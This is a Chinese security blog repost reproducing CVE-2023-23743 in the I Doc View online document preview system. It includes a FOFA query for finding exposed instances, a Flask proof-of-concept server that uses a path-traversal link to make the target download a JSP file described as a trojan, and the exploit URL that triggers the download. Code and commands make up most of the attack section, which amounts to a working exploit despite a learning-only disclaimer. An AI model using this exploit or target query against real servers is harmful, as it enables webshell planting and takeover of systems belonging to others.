在线文档预览系统 CVE-2023-23743

admin 2023年12月21日09:37:38评论32 views字数 1008阅读3分21秒阅读模式


一、免责声明:


      本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!


二、产品介绍:


在线文档预览系统 CVE-2023-23743

三、资产梳理:


fofa:title="I Doc View"

四、漏洞复现:


首先服务器一个index.html中放入一个href、img或者script定向到jsp木马,I Doc View会自动爬取我们的页面下载我们的木马。

1、使用python的起一个href定向到木马的index.html放到vps上

from flask import Flaskimport argparse
parse = argparse.ArgumentParser()parse.add_argument("-port", type=int, help="Save port.", default=8989)args = parse.parse_args()
app = Flask(__name__)

@app.route('/index.html')def index(): return """<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>title</title> <link rel="stylesheet" href="..\..\..\docview\aaaa.jsp"></head><body></body></html>"""

@app.route('/..\..\..\docview\aaaa.jsp')def jsp_file(): return '''<% out.print("This is a vul test!");%>'''

if __name__ == '__main__': app.run(host="0.0.0.0", port=args.port)

保存为poc.py

pip install flask启动:python poc.py -port 8989

在线文档预览系统 CVE-2023-23743

poc:

http://target/html/2word?url=http://vps:8989/index.html

vps收到请求、响应即攻击成功:

在线文档预览系统 CVE-2023-23743

在线文档预览系统 CVE-2023-23743


原文始发于微信公众号(fly的渗透学习笔记):在线文档预览系统 CVE-2023-23743

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月21日09:37:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   在线文档预览系统 CVE-2023-23743http://cn-sec.com/archives/2316922.html

发表评论

匿名网友 填写信息